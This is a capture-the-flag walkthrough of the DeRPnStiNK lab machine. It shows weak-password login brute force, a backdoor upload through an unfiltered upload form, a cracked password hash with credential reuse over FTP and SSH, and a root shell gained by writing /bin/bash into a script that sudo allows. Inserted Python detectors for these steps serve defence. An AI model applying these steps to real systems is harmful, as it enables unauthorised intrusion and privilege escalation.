Information gathering


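Three ports are open: 21, 22, 80
Visit port 80; flag1 is in the page source

Nothing else of interest there, so scan the directories

A few useful results
http://192.168.83.154/php/phpmyadmin/
http://192.168.83.154/weblog/
http://192.168.83.154/weblog/wp-admin/ ---- weak-password brute force: admin admin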


File uploads are not filtered, so upload a backdoor
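One way to spot the two web-side steps above (repeated logins against wp-login.php, then a script served from the upload directory) in an access log. This is an added example, not part of the original write-up; the log lines, client addresses and the /weblog/wp-content/uploads/ location of the uploaded file are constructed assumptions.

```python
import re
from collections import Counter

def _line(ip, method, path, status):
    # Constructed Apache "combined" style line; addresses and timestamps are made up.
    return f'{ip} - - [23/Aug/2017:13:29:00 +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "-"'

SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", "POST", "/weblog/wp-login.php", 200)] * 6
    + [_line("10.0.0.5", "POST", "/weblog/wp-login.php", 302),
       _line("10.0.0.9", "POST", "/weblog/wp-login.php", 200),
       _line("10.0.0.9", "POST", "/weblog/wp-login.php", 302),
       _line("10.0.0.9", "GET", "/weblog/wp-content/uploads/2017/08/photo.jpg", 200),
       _line("10.0.0.5", "GET", "/weblog/wp-content/uploads/2017/08/upload.php", 200)]
)

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Anything PHP-like served from the uploads tree; a media directory should never execute code.
UPLOAD_EXEC_RE = re.compile(r"/wp-content/uploads/[^?]*\.(?:php\d?|phtml|phar)(?:\?|$)", re.I)

def detect(log_text, threshold=5):
    """Return (rule, client, path) findings in log order."""
    failed, findings = Counter(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m[1], m[2], m[3], int(m[4])
        if method == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            if status == 200:      # WordPress re-renders the form on a failed login
                failed[ip] += 1
            elif status == 302:    # and redirects on success
                if failed[ip] >= threshold:
                    findings.append(("login-after-failures", ip, path))
                failed[ip] = 0
        if status == 200 and UPLOAD_EXEC_RE.search(path):
            findings.append(("php-served-from-uploads", ip, path))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

A password as weak as admin/admin can be guessed before any failure threshold is reached, so the uploads rule is the more dependable signal here.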


The config file; there is also a phpmyadmin that has not been logged into yet

root mysql


flag2

unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Cracked with john: wedgie57


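Logging back in to WordPress turned up nothing new. We already got onto the server through the web earlier, so use that foothold first. There are two users; try logging in with the password recovered earlier.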

stinky wedgie57

flag3

Try logging in to ftp with stinky wedgie57

mv derpissues.pcap ~/ftp/files/ --- move it into the ftp directory

Found an ssh key


Connect with Xshell, then analyse derpissues.pcap

mrderp:"derpderpderpderpderpderpderp"

mrderp@DeRPnStiNK:~/Desktop$ cat helpdesk.log
From: Help Desk helpdesk@derpnstink.local
Date: Thu, Aug 23, 2017 at 1:29 PM
Subject: sudoers ISSUE=242 PROJ=26
To: Derp, Mr (mrderp) [C]
When replying, type your text above this line.
Help Desk Ticket Notification
Thank you for contacting the Help Desk. Your ticket information is below. If you have any
additional information to add to this ticket, please reply to this notification.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us. Note that the Help Desk’s busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
Toll-free: 1-866-504-9552
Phone: 301-402-7469
TTY: 301-451-5939
Ticket Title: Sudoers File issues
Ticket Number: 242
Status: Break/fix
Date Created: 08/23/2017
Latest Update Date: 08/23/2017
Contact Name: Mr Derp
CC’s: Uncle Stinky
Full description and latest notes on your Ticket: Sudoers File issues
Notification
Regards,
Service Desk
Listen with focus, answer with accuracy, assist with compassion.
From: Help Desk
Date: Mon, Sep 10, 2017 at 2:53 PM
Subject: sudoers ISSUE=242 PROJ=26
To: Derp, Mr (mrderp) [C]
When replying, type your text above this line.
Closed Ticket Notification
Thank you for contacting the Help Desk. Your ticket information and its resolution is
below. If you feel that the ticket has not been resolved to your satisfaction or you need additional
assistance, please reply to this notification to provide additional information.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us or visit our Self Help Web page at https://pastebin.com/RzK9WfGw
Note that the Help Desk’s busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
Toll-free: 1-866-504-9552
Phone: 301-402-7469
TTY: 301-451-5939
Ticket Title: sudoers issues
Ticket Number: 242
Status: Closed
Date Created: 09/10/2017
Latest Update Date: 09/10/2017
CC’s:
Resolution: Closing ticket. ticket notification.
Regards,
eRA Service Desk
Listen with focus, answer with accuracy, assist with compassion.
For more information, dont forget to visit the Self Help Web page!!!

Not much use. Check which files can be run with root privileges

sudo -l


That file does not exist, so just run:

echo "/bin/bash" > /home/mrderp/binaries/derpy.sh
chmod +x derpy.sh
sudo ./derpy.sh

And then we have root privileges
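The escalation works because sudo is allowed to run a path that mrderp can create himself. The added Python audit below (not from the original write-up) reads sudoers rules and reports every granted command that is missing or sits under a directory a non-root user owns or can write to; the sample rule is constructed from the path used above, since the page does not show the real sudoers entry.

```python
import os
import re
import stat

# "user host=(runas) [TAG:] cmd, cmd" - enough for simple rules; aliases and includes are not expanded.
RULE_RE = re.compile(r"^\s*([^\s#]+)\s+[^\s=]+\s*=\s*(?:\([^)]*\)\s*)?(?:\w+:\s*)*(.+)$")

# Constructed sudoers text; only the derpy.sh path comes from the write-up.
SAMPLE = (
    "Defaults env_reset\n"
    "root ALL=(ALL:ALL) ALL\n"
    "mrderp ALL=(ALL) /home/mrderp/binaries/derpy.sh\n"
)

def rule_commands(sudoers_text):
    """Yield (user, path) for every absolute command path granted by a simple rule."""
    for line in sudoers_text.splitlines():
        m = RULE_RE.match(line)
        if m and m.group(1) != "Defaults":
            for cmd in m.group(2).split(","):
                if cmd.strip().startswith("/"):
                    yield m.group(1), cmd.split()[0]

def takeover_reasons(path, trusted_uids=(0,), base="/"):
    """Why a non-root user could create or replace `path` (empty list: nothing found)."""
    base, cur = os.path.realpath(base), os.path.realpath(path)
    reasons = [] if os.path.exists(cur) else [f"missing: {cur}"]
    while True:  # check the target and every ancestor directory up to `base`
        if os.path.exists(cur):
            st = os.stat(cur)
            if st.st_uid not in trusted_uids:
                reasons.append(f"owned by uid {st.st_uid}: {cur}")
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append(f"group/other-writable: {cur}")
        if cur in (base, os.path.dirname(cur)):
            return reasons
        cur = os.path.dirname(cur)

def audit(sudoers_text, trusted_uids=(0,), base="/"):
    """Map each granted command path to its list of takeover reasons."""
    return {p: takeover_reasons(p, trusted_uids, base) for _, p in rule_commands(sudoers_text)}

if __name__ == "__main__":
    for path, reasons in audit(SAMPLE).items():
        print(path, "->", reasons or "ok")
```

Rules that pass this check point at root-owned files in root-owned, non-writable directories such as /usr/local/sbin.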
